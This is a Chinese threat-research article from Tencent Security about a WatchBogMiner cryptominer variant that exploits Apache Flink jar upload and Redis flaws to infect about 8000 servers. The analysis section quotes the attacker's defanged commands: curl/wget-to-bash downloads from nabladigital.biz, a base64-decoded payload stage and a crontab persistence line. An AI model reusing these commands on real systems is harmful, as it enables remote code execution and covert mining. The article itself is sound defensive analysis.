产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御验证码
T-Sec 天御文本内容安全
T-Sec 天御视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→
解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
NEW
最新动态
威胁研究
合作伙伴
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云

威胁研究

正文

腾讯主机安全（云镜）捕获WatchBogMiner挖矿木马新变种，约8000台服务器受控挖矿

2020-10-27 09:22:00

腾讯主机安全（云镜）捕获WatchBogMiner挖矿木马最新变种对云主机的攻击，该变种利用Apache Flink任意Jar包上传导致远程代码执行漏洞入侵云主机，然后下载文件名为“watohdog”的门罗币挖矿木马。

一、背景

腾讯主机安全（云镜）捕获WatchBogMiner挖矿木马最新变种对云主机的攻击，该变种利用Apache Flink任意Jar包上传导致远程代码执行漏洞入侵云主机，然后下载文件名为“watohdog”的门罗币挖矿木马。

该挖矿木马最初的版本是针对Linux服务器利用Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件的远程代码执行漏洞进行攻击。根据其最初下载的挖矿木马文件名，安全厂商将其命名为“Watchbog”挖矿木马。

腾讯安全近期检测到“Watchbog”的最新变种开始利用Redis未授权访问漏洞、Apache Flink远程代码执行漏洞入侵传播，根据其算力推测，该变种已控制约8000台服务器挖矿，挖矿收益折合人民币约1.2万元。

腾讯安全系列产品应对WatchBogMiner最新变种的响应清单如下：

应用

场景

安全产品

解决方案

威

胁

情

报

腾讯T-Sec

威胁情报云查服务

（SaaS）

1）WatchBogMiner黑产团伙相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1）WatchBogMiner黑产团伙相关信息和情报已支持检索。

网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

（Cloud Firewall，CFW）

基于网络流量进行威胁检测与主动拦截，已支持检测：

1）WatchBogMiner关联的IOCs

2）Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)

3）Supervisord远程命令执行漏洞(CVE-2017-11610)

4）ThinkPHP远程命令执行漏洞

5）Apache FLink未授权上传jar包远程代码执行漏洞

6）Redis未授权访问漏洞

有关云防火墙的更多信息，可参考：
https://cloud.tencent.com/product/cfw

腾讯T-Sec 主机安全

（Cloud Workload Protection，CWP）

腾讯主机安全（云镜）已支持检测：

1）WatchBogMiner相关木马程序；

2）Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)

3）Supervisord远程命令执行漏洞(CVE-2017-11610)

4）ThinkPHP远程命令执行漏洞

5）Apache FLink未授权上传jar包远程代码执行漏洞

6）Redis未授权访问漏洞

腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp

腾讯T-Sec 安全运营中心

基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html

非云企业安全防护

腾讯T-Sec

高级威胁检测系统

（腾讯御界）

腾讯御界基于网络流量进行威胁检测，已支持检测：

1）Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)

2）Supervisord远程命令执行漏洞(CVE-2017-11610)

3）ThinkPHP远程命令执行漏洞

4）Apache FLink未授权上传jar包远程代码执行漏洞

5）Redis未授权访问漏洞

关于T-Sec高级威胁检测系统的更多信息，可参考：

https://cloud.tencent.com/product/nta

二、详细分析

Apache Flink核心是一个流式的数据流执行引擎，其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎，Apache Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

2019年11月Aapche Flink被爆出漏洞，攻击者可直接在Apache Flink中上传任意jar包，从而达到远程代码执行的目的。漏洞POC代码已被公开：https://github.com/LandGrey/flink-unauth-rce

攻击者首先利用Flink漏洞上传恶意jar包：

然后执行远程命令：

/bin/bash -c (curl -s http[:]//nabladigital.biz/img/ddxox.png||wget -q -O- http[:]//nabladigital.biz/img/ddxox.png)|bash

其中ddxox.png代码:

nohup bash -c '(curl -fsSL http[:]//nabladigital.biz/img/sghbw.png||wget -q -O- http[:]//nabladigital.biz/img/sghbw.png)|bash' > /dev/null 2>&1 &

rm -rf /tmp/seele*

sghbw.png代码:

(curl -fsSL http[:]//nabladigital.biz/img/afhpo.png||wget -q -O - http[:]//nabladigital.biz/img/afhpo.png)|base64 -d|bash

最终执行的afhpo.png首先定义三个变量house、park、room

house=http[:]//nabladigital.biz/img/ddxox.png

park= https[:]//files.catbox.moe/5j9zcz

room= https[:]//a.pomf.cat/wariie

然后crontab命令创建定时任务，每10分钟下载执行一次以上脚本：

(crontab -l 2>/dev/null; echo "*/10 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O- $park||curl -fsSLk $room||wget -q -O- $room)|bash > /dev/null 2>&1")| crontab –

通过写入以下文件创建定时任务：

/etc/cron.d/root

/etc/cron.d/system

/etc/cron.d/apache

/var/spool/cron/crontabs/root

/var/spool/cron/root

接着下载挖矿木马http[:]//nabladigital.biz/img/qczgb.png，base64解码后保存至目录/tmp/systemd-private-64aa0008dfb47a84a96f7974811b772f-systemd-timesyncd.service-TffNff/tmp/watohdog（之前的版本，该文件名为watchbog）。